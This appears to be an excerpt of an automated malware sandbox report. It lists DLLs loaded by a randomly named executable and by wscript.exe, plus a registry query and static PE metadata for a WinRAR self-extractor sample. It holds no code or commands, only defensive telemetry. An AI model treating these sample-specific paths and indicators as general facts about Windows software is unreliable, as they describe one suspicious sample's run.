            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: netutils.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: slc.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: sppc.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: rasman.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: mscoree.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: kernel.appcore.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: version.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: uxtheme.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: windows.storage.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: wldp.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: profapi.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: cryptsp.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: rsaenh.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: cryptbase.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: mscoree.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: kernel.appcore.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: version.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: uxtheme.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: windows.storage.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: wldp.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: profapi.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: cryptsp.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: rsaenh.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: cryptbase.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: sspicli.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: amsi.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: userenv.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: wbemcomn.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: iphlpapi.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: dnsapi.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: dhcpcsvc6.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: dhcpcsvc.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: winnsi.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: propsys.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: edputil.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: urlmon.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: iertutil.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: srvcli.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: netutils.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: windows.staterepositoryps.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: policymanager.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: msvcp110_win.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: rasapi32.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: rasman.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: rtutils.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: wintypes.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: appresolver.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: bcp47langs.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: slc.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: sppc.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: onecorecommonproxystub.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: onecoreuapcommonproxystub.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: mswsock.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: winhttp.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: rasadhlp.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: fwpuclnt.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: ntmarta.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: mscoree.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: kernel.appcore.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: version.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: uxtheme.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: windows.storage.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: wldp.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: profapi.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: cryptsp.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: rsaenh.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: cryptbase.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: sspicli.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: amsi.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: userenv.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: wbemcomn.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: iphlpapi.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: dnsapi.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: dhcpcsvc6.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: dhcpcsvc.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: winnsi.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: propsys.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: edputil.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: urlmon.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: iertutil.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: srvcli.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: netutils.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: rasapi32.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: rasman.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: rtutils.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: mswsock.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: winhttp.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: windows.staterepositoryps.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: policymanager.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: msvcp110_win.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: wintypes.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: appresolver.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: bcp47langs.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: slc.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: sppc.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: onecorecommonproxystub.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: onecoreuapcommonproxystub.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: rasadhlp.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: fwpuclnt.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: ntmarta.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: mscoree.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: kernel.appcore.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: version.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: uxtheme.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: windows.storage.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: wldp.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: profapi.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: cryptsp.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: rsaenh.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: cryptbase.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: sspicli.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: amsi.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: userenv.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: wbemcomn.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: iphlpapi.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: dnsapi.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: dhcpcsvc6.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: dhcpcsvc.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: winnsi.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: propsys.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: edputil.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: urlmon.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: iertutil.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: srvcli.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: netutils.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: windows.staterepositoryps.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: policymanager.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: msvcp110_win.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: wintypes.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: appresolver.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: bcp47langs.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: slc.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: sppc.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: onecorecommonproxystub.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: onecoreuapcommonproxystub.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: ntmarta.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: rasapi32.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: rasman.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: rtutils.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: mswsock.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: winhttp.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: rasadhlp.dll
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: fwpuclnt.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
            Source: adKGhCOOzg.exeStatic file information: File size 3099403 > 1048576
            Source: adKGhCOOzg.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: adKGhCOOzg.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: adKGhCOOzg.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: adKGhCOOzg.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: adKGhCOOzg.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: adKGhCOOzg.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: adKGhCOOzg.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: adKGhCOOzg.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: adKGhCOOzg.exe
            Source: adKGhCOOzg.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
